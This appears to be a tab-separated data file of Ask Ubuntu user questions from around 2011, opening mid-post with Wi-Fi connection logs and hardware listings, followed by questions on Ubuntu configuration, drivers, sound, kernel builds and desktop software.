04:17:12 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : associating - > disconnected jan 19 04:17:12 ubuntu networkmanager : config : set interface ap_scan to 1 jan 19 04:17:12 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : disconnected - > scanning jan 19 04:17:13 ubuntu wpa_supplicant [ 1289 ] : wps-ap-available jan 19 04:17:13 ubuntu wpa_supplicant [ 1289 ] : trying to associate with 94:44:52:0d:22:0d ( ssid='wuggawoo ' freq=2437 mhz ) jan 19 04:17:13 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : scanning - > associating jan 19 04:17:23 ubuntu wpa_supplicant [ 1289 ] : authentication with 94:44:52:0d:22:0d timed out . jan 19 04:17:23 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : associating - > disconnected jan 19 04:17:23 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : disconnected - > scanning jan 19 04:17:24 ubuntu aptdaemon : info : initializing daemon jan 19 04:17:25 ubuntu wpa_supplicant [ 1289 ] : wps-ap-available jan 19 04:17:25 ubuntu wpa_supplicant [ 1289 ] : trying to associate with 94:44:52:0d:22:0d ( ssid='wuggawoo ' freq=2437 mhz ) jan 19 04:17:25 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : scanning - > associating jan 19 04:17:27 ubuntu networkmanager : wlan0 : link timed out . kern.log jan 19 04:18:11 ubuntu kernel : [ 142.420024 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d timed out jan 19 04:18:13 ubuntu kernel : [ 144.333847 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 1 ) jan 19 04:18:13 ubuntu kernel : [ 144.539996 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 2 ) jan 19 04:18:13 ubuntu kernel : [ 144.750027 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 3 ) jan 19 04:18:14 ubuntu kernel : [ 144.940022 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d timed out jan 19 04:18:25 ubuntu kernel : [ 155.832995 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 1 ) jan 19 04:18:25 ubuntu kernel : [ 156.030046 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 2 ) jan 19 04:18:25 ubuntu kernel : [ 156.230039 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 3 ) jan 19 04:18:25 ubuntu kernel : [ 156.430039 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d timed out syslog jan 19 04:18:46 ubuntu wpa_supplicant [ 1289 ] : authentication with 94:44:52:0d:22:0d timed out . jan 19 04:18:46 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : associating - > disconnected jan 19 04:18:46 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : disconnected - > scanning jan 19 04:18:48 ubuntu wpa_supplicant [ 1289 ] : wps-ap-available jan 19 04:18:48 ubuntu wpa_supplicant [ 1289 ] : trying to associate with 94:44:52:0d:22:0d ( ssid='wuggawoo ' freq=2437 mhz ) jan 19 04:18:48 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : scanning - > associating jan 19 04:18:48 ubuntu kernel : [ 178.833905 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 1 ) jan 19 04:18:48 ubuntu kernel : [ 179.030035 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 2 ) jan 19 04:18:48 ubuntu kernel : [ 179.230020 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d ( try 3 ) jan 19 04:18:48 ubuntu kernel : [ 179.433634 ] wlan0 : direct probe to ap 94:44:52:0d:22:0d timed out lspci 00:00.0 host bridge : advanced micro devices [ amd ] rs780 host bridge 00:02.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( ext gfx port 0 ) 00:05.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 1 ) 00:06.0 pci bridge : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 2 ) 00:11.0 sata controller : ati technologies inc sb700/sb800 sata controller [ ahci mode ] 00:12.0 usb controller : ati technologies inc sb700/sb800 usb ohci0 controller 00:12.1 usb controller : ati technologies inc sb700 usb ohci1 controller 00:12.2 usb controller : ati technologies inc sb700/sb800 usb ehci controller 00:13.0 usb controller : ati technologies inc sb700/sb800 usb ohci0 controller 00:13.1 usb controller : ati technologies inc sb700 usb ohci1 controller 00:13.2 usb controller : ati technologies inc sb700/sb800 usb ehci controller 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 3a ) 00:14.1 ide interface : ati technologies inc sb700/sb800 ide controller 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) 00:14.3 isa bridge : ati technologies inc sb700/sb800 lpc host controller 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge 00:14.5 usb controller : ati technologies inc sb700/sb800 usb ohci2 controller 00:18.0 host bridge : advanced micro devices [ amd ] k10 [ opteron , athlon64 , sempron ] hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] k10 [ opteron , athlon64 , sempron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k10 [ opteron , athlon64 , sempron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k10 [ opteron , athlon64 , sempron ] miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] k10 [ opteron , athlon64 , sempron ] link control 01:00.0 vga compatible controller : nvidia corporation g80 [ geforce 8800 gts ] ( rev a2 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) 03:00.0 firewire ( ieee 1394 ) : jmicron technology corp. ieee 1394 host controller lsusb bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 003 : id 046d : c517 logitech , inc. lx710 cordless desktop laser bus 004 device 002 : id 045e:0730 microsoft corp . bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 13d3:3247 imc networks 802.11 n/g/b wireless lan adapter bus 002 device 002 : id 0718:0628 imation corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 046d:08c2 logitech , inc. quickcam ptz bus 001 device 002 : id 0424:2228 standard microsystems corp. 9-in-2 card reader bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub with no security on my router i still ca n't connect , i get : jan 19 15:58:01 ubuntu wpa_supplicant [ 1165 ] : authentication with 94:44:52:0d:22:0d timed out . jan 19 15:58:01 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : associating - > disconnected jan 19 15:58:01 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : disconnected - > scanning jan 19 15:58:02 ubuntu wpa_supplicant [ 1165 ] : wps-ap-available jan 19 15:58:02 ubuntu wpa_supplicant [ 1165 ] : trying to associate with 94:44:52:0d:22:0d ( ssid='wuggawoo ' freq=2437 mhz ) jan 19 15:58:02 ubuntu wpa_supplicant [ 1165 ] : association request to the driver failed jan 19 15:58:02 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : scanning - > associating jan 19 15:58:05 ubuntu networkmanager : wlan0 : link timed out . jan 19 15:58:07 ubuntu wpa_supplicant [ 1165 ] : authentication with 94:44:52:0d:22:0d timed out . jan 19 15:58:07 ubuntu networkmanager : ( wlan0 ) : supplicant connection state : associating - > disconnected jan 19 15:58:07 ubuntu networkmanager : ( wlan0 ) : supplicant connec
22249	ipv6 faq and checklist for a home user ?	can we start an ipv6 faq and checklist for a ( * ) ubuntu home user , covering both hardware and software ? the answers can cover the following areas : isp readiness . home router readiness and configuration . ( * ) ubuntu configuration . since when has ( ) ubuntu been ipv6 ready ? ( do we really need the latest version of ( ) ubuntu ? ) how to configure lan and cross-lan services ( ssh , /etc/hosts , etc. ) ? and more .
22251	what filesystem should i choose for netbook ?	i`ve an eeepc netbook . what filesystem should i choose for ubuntu installation ? i also want to make a partion accessible for ubuntu and win . what should i choose ?
22258	software to burn cds and dvds	i have been trying to use brasero to copy cds , but it asks for toc2cue and cdrdao installation , i tried k3b and it says k3b can not copy multi-tracks . can anyone suggest a software which would not give me hard times ( something like nero but free ) . thanks !
22259	how to make `` r '' use all cpus	i am using gnu r to calculate a huge dataset . my pc has 4 cpu-cores , and i can see , that r is using only 1 cpu . is there a way to tell r to use all 4 cpus in order to make the calculation complete faster ?
22265	updating ubuntu server from 8.10 to 10.04	i have a vps that has ubuntu 8.10 server edition installed on it and i would like to upgrade it to 10.04 . what would be the correct way of doing this ? i only have ssh access to it and a `` start/shutdown vps '' in the client panel of the vendor . in other words , i do not have physical access to it . also worth noting is that i apparently can not install programs any more since the sources ( osuosl.org ? ) are not online . not the ones this server has set anyway . # apt-get update ign http : //ubuntu.osuosl.org intrepid release.gpg ign http : //ubuntu.osuosl.org intrepid/main translation-en_us ign http : //ubuntu.osuosl.org intrepid/universe translation-en_us ign http : //ubuntu.osuosl.org intrepid release ign http : //ubuntu.osuosl.org intrepid/main packages ign http : //ubuntu.osuosl.org intrepid/universe packages err http : //ubuntu.osuosl.org intrepid/main packages 404 not found err http : //ubuntu.osuosl.org intrepid/universe packages 404 not found w : failed to fetch http : //ubuntu.osuosl.org/ubuntu/dists/intrepid/main/binary-amd64/packages.gz 404 not found w : failed to fetch http : //ubuntu.osuosl.org/ubuntu/dists/intrepid/universe/binary-amd64/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead .
22267	error when i try to compile the kernel 2.6.37	i have downloaded the kernel 2.6.37 from kernel.org . i have tried to compile it but i get an error : $ make menuconfig scripts/kconfig/conf -- silentoldconfig kconfig *** *** configuration file `` .config '' not found ! *** *** please run some configurator ( e.g . `` make oldconfig '' or *** `` make menuconfig '' or `` make xconfig '' ) . *** make [ 2 ] : *** [ silentoldconfig ] error 1 make [ 1 ] : *** [ silentoldconfig ] error 2 make : *** no rule to make target `include/config/auto.conf ' , needed by `include/config/kernel.release ' . stop . i have copied the actual kernel configuration to .config : cp /boot/config-2.6.37-20110117 .config i have executed make menuconfig another time but it compiles the full kernel without showing a menu . o_o i have compiled this kernel a few days without problems . any help ? thanks .
22268	how to charge the battery till 60-80 % only ?	i just got my laptop 's battery replaced and read a bit about how to prolong it 's life . most people say that the best choice is not to charge it will 100 % , but rather to 60-80 % . my battery is quite powerful ( 8 hours declared ) , so it 's okay for me to charge it like this , and i mainly work plugged in . in windows which ships with the laptop i can see the way to set the threshold , and there is even the auto mode , where system decides itself how much to charge . is there something like this in ubuntu ?
22271	how do i control front and back volume independently with cloned stereo signal	i have my 7.1 soundcard set to stereo and plugged in two stereo thingies ( a. my desktop speakers b. my stereo ) to the front respectively rear plug . now i would like to an easy way to mute/volume control them independently - gui if possible . if i set my soundcard to 4.0 , the pulse audio mixer gives me sliders for front and back but the problem is that 's the input signal . so if i mute the front there and i 'm listening to stereo everything remains silent . but what i 'd have liked in that scenario would be the front to be silent and the back playing the full stereo signal . is there a way to do that or something similar ?
22276	does `` concurrency_level=x '' affect to all compilations made with make ?	does `` concurrency_level=x '' variable affects to compilations made with make ?
22283	updating from libnet-z3950-perl to libnet-z3950-zoom-perl	i have a server running 8.04 with the libnet-z3950-perl package i got some issues with encoding and while trying to debug them on my local 10.10 installation i got the following error : # apt-get install libnet-z3950-perl reading package lists ... done building dependency tree reading state information ... done package libnet-z3950-perl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libnet-z3950-zoom-perl e : package 'libnet-z3950-perl ' has no installation candidate now i want to use the libnet-z3950-zoom-perl package , which includes the libnet-z3950-perl package . my question is is the libnet-z3950-zoom-perl package backward compatible with 8.04 , and are there any special steps i have to take , other then downloading the package and extracting it on my server , to get it to work ? edit : i also asked on launchpad
22285	clarification of the third-party software options during system installation	during installation , the user is presented with the following dialogue : the 'flash ' and 'mp3 ' options are pretty self-explanatory , but what about the 'wireless hardware ' and 'other media ' options . what 'other media ' is this referring to , and how is the installation of wireless hardware handled . does ubiquity attempt to recognise the computer 's wireless device and install the appropriate drivers or does it just dump a 'proprietary wireless driver module ' into the kernel and be done with it ? how does it react if the computer has no wireless card ?
22287	how to run game on one monitor and have programs on other monitor still visible ?	how can i make programs on second monitor still visible while playing game ( wolfenstein : enemy territory ) ? i know that i can use windowed mode , but playing in windowed kinda feels different , like game has a lot of tiny video lags . edit1 : i am running gnome on latest ubuntu , and while one monitor has game on it and other is completely black ( my notifications are set up so they pop up on second monitor ) i can see notifications ( libnotify and skype ) .
22292	get chat ( empathy ) to pop up when people are talking to me	when people start a new convo with me , all i see initially is that the message indicator is lit . this is n't quite obvious , so i 'd like the new chat window to just pop up in my face . how can i do this ?
22294	what do the dependencies of 'finch ' ( cli im client ) do	bug # 395001 is currently giving me a headache . the op is attempting to install finch , a text-based instant messaging client , but is upset about the amount of dependencies that are being installed . when attempting to install it on my own server , the following packages listed below were installed . what 's the purpose of all these packages in such a program ? is gstreamer included because it supports audio communication ? the finch user manual does n't help much . the following extra packages will be installed : gstreamer0.10-nice gstreamer0.10-plugins-base gstreamer0.10-plugins-good gstreamer0.10-x gvfs gvfs-backends indicator-application libaa1 libappindicator1 libarchive1 libatasmart4 libavahi-glib1 libavc1394-0 libbluetooth3 libcaca0 libcdio-cdda0 libcdio-paranoia0 libcdio10 libcdparanoia0 libdbusmenu-glib1 libdbusmenu-gtk1 libdv4 libflac8 libgadu3 libgdu0 libglu1-mesa libgnome-keyring0 libgphoto2-2 libgphoto2-port0 libgssdp-1.0-2 libgstfarsight0.10-0 libgstreamer-plugins-base0.10-0 libgudev-1.0-0 libgupnp-1.0-3 libgupnp-igd-1.0-3 libgvfscommon0 libiec61883-0 libimobiledevice1 libindicator1 libjson-glib-1.0-0 libmeanwhile1 libnice0 libntfs10 libogg0 libopenobex1 liborc-0.4-0 libperl5.10 libplist1 libpolkit-agent-1-0 libpolkit-backend-1-0 libproxy0 libpurple-bin libpurple0 libraw1394-11 libsgutils2-2 libshout3 libsilc-1.1-2 libsilcclient-1.1-3 libsmbclient libsoup-gnome2.4-1 libsoup2.4-1 libspeex1 libtag1-vanilla libtag1c2a libtheora0 libusb-1.0-0 libusbmuxd1 libv4l-0 libvisual-0.4-0 libvisual-0.4-plugins libvorbis0a libvorbisenc2 libwavpack1 libwbclient0 libzephyr4 mtools ntfsprogs obex-data-server pidgin-data policykit-1 policykit-1-gnome udisks usbmuxd suggested packages : libdv-bin gnome-keyring gphoto2 gtkam gstreamer-codec-install gnome-codec-install libraw1394-doc sg3-utils speex floppyd xfsprogs reiserfsprogs mdadm cryptsetup the following new packages will be installed : finch gstreamer0.10-nice gstreamer0.10-plugins-base gstreamer0.10-plugins-good gstreamer0.10-x gvfs gvfs-backends indicator-application libaa1 libappindicator1 libarchive1 libatasmart4 libavahi-glib1 libavc1394-0 libbluetooth3 libcaca0 libcdio-cdda0 libcdio-paranoia0 libcdio10 libcdparanoia0 libdbusmenu-glib1 libdbusmenu-gtk1 libdv4 libflac8 libgadu3 libgdu0 libglu1-mesa libgnome-keyring0 libgphoto2-2 libgphoto2-port0 libgssdp-1.0-2 libgstfarsight0.10-0 libgstreamer-plugins-base0.10-0 libgudev-1.0-0 libgupnp-1.0-3 libgupnp-igd-1.0-3 libgvfscommon0 libiec61883-0 libimobiledevice1 libindicator1 libjson-glib-1.0-0 libmeanwhile1 libnice0 libntfs10 libogg0 libopenobex1 liborc-0.4-0 libperl5.10 libplist1 libpolkit-agent-1-0 libpolkit-backend-1-0 libproxy0 libpurple-bin libpurple0 libraw1394-11 libsgutils2-2 libshout3 libsilc-1.1-2 libsilcclient-1.1-3 libsmbclient libsoup-gnome2.4-1 libsoup2.4-1 libspeex1 libtag1-vanilla libtag1c2a libtheora0 libusb-1.0-0 libusbmuxd1 libv4l-0 libvisual-0.4-0 libvisual-0.4-plugins libvorbis0a libvorbisenc2 libwavpack1 libwbclient0 libzephyr4 mtools ntfsprogs obex-data-server pidgin-data policykit-1 policykit-1-gnome udisks usbmuxd 0 upgraded , 84 newly installed , 0 to remove and 0 not upgraded . need to get 17.4mb of archives . after this operation , 58.0mb of additional disk space will be used .
22297	bad sound quality and headphones not working	using ubuntu 10.10 on a hp pavilion t3019.es , which has a realtek alc880 soundcard . it has 6 rear jack outputs , plus digital audio input and output , plus 3 front jacks ( mic , headphones and a blue one which i do n't know what 's for ) . the sound on my computer is very low , and when i raise the volume up to 50 % , it starts sounding distorted , crackling . also , the headphones do n't work when i plug them ( it just keeps on playing through the speakers ) . i tried to comment the `` /etc/modprobe.d/alsa-base.conf '' file according to the soundcard and jacks in my computer , but none of the lines added worked ( naturally , did n't added them at once ) . i found out that adding `` options snd-hda-intel model=generic '' to it made the sound better , but it 's not as good as in windows yet . i 've fulfilled a bug report with the ubuntu-bug audio command , and sent it to launchpad . here it is : https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/709799 any ideas ? other than setting the pcm value , please , did n't work for me . thanks .
22300	what utility to use to clean up after a disk is suddenly disconnected ?	in the event an external hard-drive is physically disconnected and the device is mounted using device-mapper , no cleanup is made . in particular : the directory where the drive was mounted is empty the mount is still present in mount ( 8 ) the device-mapper devices are still present the physical device is still present as /dev/sd* in this scenario , without cleaning up the items above , the first three steps need manual cleanup ( via umount , dmsetup remove and udevadm trigger -- subsystem-match=block ) . even then , the disk 's sysfs directory is still present in /sys/bus/scsi/drivers/sd and you need to manually echo 1 > delete to make sure the scsi device is unregistered . without it , replugging the disk back in does not work . so my question is - is there a program that can detect when a physical disk that 's been device mapped is no longer responding and perform the necessary cleanup ?
22302	how to fix firefox when it freezes completely after open it ?	first time ever today firefox version 3.6.13 freezed for me on ubuntu 10.10 64bit . i open firefox normally but then nothing respond on the gui.the only thing i can do is close it . when closed i try to re-open but the application still runs on the background so i have to kill it manually along with firefox-bin from the system monitor or kill pid command .. i donâ´t know what caused this..i suspect addons or maybe a proxy setting with polipo . i also installed dockbarx this morning but it seems ok with chromium now . same story after rebooting , so i left it as it is to find a solution from askubuntu what can i do now ? where do i check the logs to locate the problem ? how do i get back my working firefox without re-installation ? any suggestion is welcome .
22303	how can i change focus when a game locks it ?	i am playing wolfenstein : enemy territory , and when i play it in windowed mode , i ca n't change focus from the game to something else ( alt+tab does n't work ) .
22305	sqlite-ruby gem problem	i am trying to get my ruby on rails up and running but i ca n't seem to install sqlite3-ruby gem . when i run it i get this error : fetching : sqlite-ruby-2.2.3.gem ( 100 % ) building native extensions . this could take a while ... error : error installing sqlite-ruby : error : failed to build gem native extension . /usr/bin/ruby1.8 extconf.rb checking for main ( ) in -lsqlite ... no checking for sqlite.h ... no * extconf.rb failed * could not create makefile due to some reason , probably lack of necessary libraries and/or headers . check the mkmf.log file for more details . you may need configuration options . any solutions ?
22307	why ca n't clamdscan scan anything ?	not sure what 's going on here . i 've installed clamav , clamav-freshclam and clamav-daemon to run automated scans ( using cron ) on my machine running ubuntu desktop 10.04 lts x64 . unfortunately , clamdscan refuses to scan anything . this is the output i receive every time i try : root @ uhs : /raid/share/public/ # clamdscan -v /raid/share/public/ /raid/share/public : lstat ( ) failed : permission denied . error -- -- -- -- -- - scan summary -- -- -- -- -- - infected files : 0 total errors : 1 time : 0.004 sec ( 0 m 0 s ) root @ uhs : /raid/share/public/ # /raid/share/public has 777 permissions , and the clamav-daemon user clamav has been added to both the admin and root groups . i get the same error no matter what files or directories i try to scan . i even ran dpkg-reconfigure clamav-base and made the daemon user root to see if that would help ( which it did n't ) . and i have of course run service clamav-daemon restart in between all of these changes . i 'm aware of the cat file_name | clamdscan - option , but i need to be able to scan whole directories recursively , so obviously this wo n't work . what am i doing wrong ? can i use clamdscan ? thank you for any help . update output of sudo -u clamav stat /raid/share/public/ : root @ uhs : /raid/share/public # sudo -u clamav stat /raid/share/public/ file : `/raid/share/public/' size : 6 blocks : 0 io block : 4096 directory device : 900h/2304d inode : 54526208 links : 2 access : ( 0777/drwxrwxrwx ) uid : ( 1000/awensley ) gid : ( 120/ admin ) access : 2011-01-19 01:00:00.304365306 -0600 modify : 2011-01-18 22:47:06.793592673 -0600 change : 2011-01-19 00:42:52.023813550 -0600 root @ uhs : /raid/share/public # update 2 i have this exact same problem on 5 separate ubuntu 10.04 machines ; 3 of them servers . so either i 'm missing something or there 's a real problem here . update 3 i 've submitted this as a bug report on launchpad
22309	are there plans for handwriting recognition ?	this is a big feature when it comes to putting ubuntu onto tablets . currently , netbook edition works great for that purpose and the pen digitiser is perfect , but the handwriting would be a real dealmaker ( especially for my business - we could actually move to linux ) to compete with the windows one . cellwriter exists , but that only handles character and keyboard input ( but i do n't know about multitouch on the keyboard ) . it also needs to handle print and cursive , because character mode can be slow and uncomfortable ( unless you 're writing passwords ) . lastly , cellwriter needs to have some default letter shapes rather than having to be trained from the start . there is a software package called myscript ( by vision objects ) that handles all four modes ( keyboard , character , print , cursive ) plus calculator and fullscreen , but it 's only free as a trial . still , it would be nice to see it in the for purchase section and the trial in the free section of the software centre . the only other ones are for chinese/japanese/korean characters . what would really make a difference for us is the integration of some formal api with the os that can automatically activate when running on a tablet to pass ink data to whatever recognition system is installed , and have something available ( however rudimentary ) to use it .
22311	what is the impact of the nolapic parameter on a multiprocessor laptop ?	i have an asus x71sl with an intel dual core t3200 processor . any kernel version after 2.6.35-rc2 wo n't boot up on my machine without the nolapic kernel parameter at bootup . i have already reported this as a bug , but this is the only thing keeping me from updating to 10.10 or 11.04 when it 'll be released . should i just use the nolapic parameter as a default and move on ( and in the meantime try to resolve the bug ) or is there a big performance/other trade-off ?
22313	what is dconf , what is its function , and how do i use it ?	mark shuttleworth recently blogged about the decision to include the qt libraries in the 11.10 release , with a followup from jono bacon . mark states that the biggest challenge to integrating apps written in qt into the larger ubuntu system is qt 's current non-compatibility with dconf . what is dconf , and what is the role it plays in ubuntu ?
22314	unable to set custom icon on application launcher	i am using ubuntu 10.10 and having trouble setting a custom icon for an application launcher that i created . i have created and svg file and placed it in /usr/shared/icons/hicolor/scalable/apps/ and when i try to select it as the icon for the application launcher , it just goes back to the gnome-panel-launcher.svg default . if i put the svg file on my desktop and then select it , all is well . i 'm assuming this is some type of permission problem , but i can not seem to figure it out . i have set the permissions to be identical to the other icons in /usr/shared/icons/hicolor/scalable/apps/ , but have no luck doing that either .
22316	how can i theme my qt app to resemble one written in gtk ?	mark shuttleworth recently blogged about the decision to include the qt libraries in the 11.10 release , with a followup from jono bacon . the thing that puts me off qt apps is that they do n't blend in very well with ubuntu 's gtk-based theme . i recently read an ars technica article that mentioned that , with a bit of effort , qt apps could be make to resemble gtk apps . is there any documentation that will help me do this , and if not , does anyone at least have any idea how one would go about doing this ?
22322	how can i make my laptop 's password-less guest account automatically attempt to connect to any and all open wireless networks ?	or , alternatively : what is the closest i can get to this ? if my laptop ever gets stolen , i want it to do everything in its power to phone home . prey only kicks in after an internet connection has been established , and i do n't trust a thief to figure out how to connect to wireless networks in a foreign operating system .
22324	wubi install not completing on dell latitude d600 using 10.04 and 10.10	while trying to install a dual boot from livecd , wubi seems to go through all the steps correctly . it unpacks everything , reboots , starts to finalize the install , brings up the install slide show and seems to do everything necessary . the slide show disappears and what is left is what would normally be the background , however there is no login , no panels , no response to any input or keystrokes . using 10.04 i had a mouse cursor ( working ) with 10.10 , not even that . in 10.04 the only way to reboot is to shutdown using the power switch . when it reboots it goes through the `` finalizing install '' phase again . in 10.10 if i hit the power switch it brings up a shutdown menu that does n't respond to the keyboard , but does shutdown when the 60 seconds expire .
22327	touchpad stopped working after suspend on a toshiba l650	i have a toshiba l650 , installed ( dual boot ) ubuntu 10.10 . touchpad worked fine until i tried for the first time to suspend ( i closed the screen on the keyboard ) . the system never woke up again . reset ( battery disconnected and then reconnected ) , restart of the system , disk checks , and so on . after that , everything works fine except the touchpad , completely dead . rebooted again . the problem persists . any hints ?
22336	how to record internal audio with xvidcap ? ( not with microphone )	i installed xvidcap from synaptic . there is an option in preferences to turn on audio recording but there is no audio in final output . i followed instructions on ubuntu forums and downgraded the package to an older version but still ca n't get it working .
22337	will 11.04 ship with nautilus 3 ?	will ubuntu 11.04 contain new , redesigned nautilus 3 from gnome 3 ?
22338	set `` remote desktop '' host server remotely	when you want to set a server to accept `` remote desktop '' connections , you do : system \ preferences \ remote desktop the thing is i just have a ssh connection to the server for now . how do you set it using only the command line ?
22342	what are some good uses for custom live cds	looking for some good uses for your own custom live cd/distro , including custom branded distributions for cafes etc . you can include instructions etc in your answer , as well as links to good examples . however , please limit one example per answer - though feel free to answer multiple times !
22350	how to save ubuntu from restarting on a laptop with malfunctioning video card ?	my laptop 's video card is malfunctioning . i have ubuntu 10.10 desktop . after typical boot up , it restarts , but it 's working fine in recovery mode . there is my other solved question here : how to enable ssh server in recovery mode ? i do n't want my ubuntu run in recovery mode . i want everything start normally , just without video card . i 'm expecting it to run like a remote server .
22360	high resolution cli ?	i want the resolution of my console to match my screen resolution ( 1440x900 ) . 1024x768 works fine but for some reason when i put 1440x900 when i switch to ttyx the command prompt is almost right off the bottom of the screen ! the ubuntu splash screen goes off the edge of the screen during boot as well . here is my /etc/default/grub 4 grub_default=0 5 grub_hidden_timeout=0 6 grub_hidden_timeout_quiet=true 7 grub_timeout=10 8 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` 9 grub_cmdline_linux_default= '' quiet splash '' 10 grub_cmdline_linux= '' '' 11 grub_gfxmode=1440x900 12 grub_gfxpayload_linux=keep how do i get my cli resolution to be 1440x900 ?
22361	what is the relationship between .gconf , .gnome2 , .cache , .local , and other dot-file hierarchies in my home directory ?	according to this answer , .local .cache and .config are , by convention , configuration storage locations adopted by gnome and ubuntu . are .gnome .gnome2 and .gconf therefore legacy configuration directories , or are they supposed to co-exist ? and does the adoption of dconf alter these dot-file application config conventions ? finally , what is the relation of the gconf-editor data settings to these directories ? do .gnome/.gconf contain the same info that gconf-editor accesses ? updates : xdg has been pointed to as the reason for .cache , .local , and .config . this question on dconf advises that dconf will be the replacement for gconf , as documented on gnome.org . furthermore , jo達o says that dconf is the gnome technology used to store application settings . [ ... ] dconf is the gnome3 replacement for gconf which has not been maintained for some time . dconf is also expected to bring performance improvements over gconf ( relevant for applications startup ) . i expect , based on that that there will be a somewhat anarchic migration path from gconf settings to dconf . i would love to hear any additional perspectives .
22362	resume fails on dell e6510	this is quite similar to several other posts . system was running 10.04 without problems for several months . recently upgraded to 10.10 and have not been able to resume from closing lid on laptop since . have to reboot from forced power down . no other posts i have seen have suggested an approach to solving the problem .
22369	will nautilus be replaced as the default file manager in 11.04 ?	i want to know if nautilus will change or be replaced in natty narwhal ? if so to what ?
22371	printing to cups from windows 7 64bit	when i try to connect a windows 7 64bit to a cups printer it keeps aking for username and password . it connected perfectly before but now it wont .
22372	how to make ext4 update files in place during writes	this question consists of two parts : how to find out what is the writing mode of ext4 ? how to configure an existing ext4 ( a journaling file system ) to do writes to a file in place such that shredding/wiping can be effective .
22373	redirect skype sound output over the network	i want to redirect the audio coming from skype ( and only skype , not other programs running at the same time ) over the network . is there any way to do that ?
22374	how to configure xvfb ?	could you please tell me how to configure xvfb in ubuntu ?
22376	how can i access windows shares after changing dns servers ( e.g . switching to opendns ) ?	i 'm on maverick trying to access shared folders hosted on windows machines across a home network . mysteriously i stopped being able to see them through nautilus ( i could n't even open windows network and see my own machine ) , nor using `` smbclient -l //hostname '' from the command line . the error code i got was nt_status_unsuccessful .
22379	why is the screen shared with me over skype is so small ?	my colleague and me are often using skype to work together , but there is a problem that bothers me very much . when he is sharing his whole screen , i only receive it in a window that takes about a fourth part of my screen ( about 50 % size ) . obviously , all text becomes unreadable . we have the same horizontal resolution , but i have a 4:3 display , and he has a 16:9 display . so it 's 1280x1024 against 1280x768 , his screen should be able to fit into mine . what 's even stranger is that when i use a laptop i have , the screen is shared with me at 100 % size . both my pc and my laptop use ubuntu 10.10 . can something be done about it ? p.s . maybe it has something to do with compiz ?
22380	nautilus file search is not working	nautilus file search is not working . it is as simple as that . nothing is ever found.. nothing happens ... ( nautilus 2.30.1 , on lucid 10.04 ) the same version of nautilus running in a vm works fine , so i know i 'm doing the right thing . one `` difference '' i 've noticed between my problem nautilus and the vm nautilus , is that the `` reload '' button never appears ... ( nor does any list of files ever appear ) ... update : i 've tried removing ~/.nautilus ( no effect ) i 've reinstalled nautilus ... ( no effect ) i 'm a bit wary of doing a full reomoval of nautilus ( and then a new install ) , because i do n't know how this will effect the desktop integration ; specifically ... what is going to happen to my nautilus notes , which are tenuously attached to files via a feature of nautilus.. .
22381	how to format a usb flash drive ?	in windows there is a straightforward `` format '' option in a flash drive 's right-click pop-up menu . where 's that in ubuntu ? i understand there 's always standard partition management command line stuff there and i 've googled the question , but is n't there a windows-like gui tool for this ?
22383	how to give read write permission to a folder and its sub folders and files ?	i have changed ownership of my localhost file on /var/www/ and its sub folders and given it permission 777 . however , whenever i add a new folder in it the new folder does not automatically get that permission . how can i give a folder 777 permission forever so that if i add a new folder or file it gets the same permission ?
22384	gnome does n't start after libdbus update	yesterday i updated dbus library via apt-get . this morning i switched on my laptop and found out that gnome does n't start properly ( it tries to display error dialog , does n't show any panels ) . xserver works fine . laptop is asus eeepc 1215n . any ideas ? edit : here are some logs : syslog messages
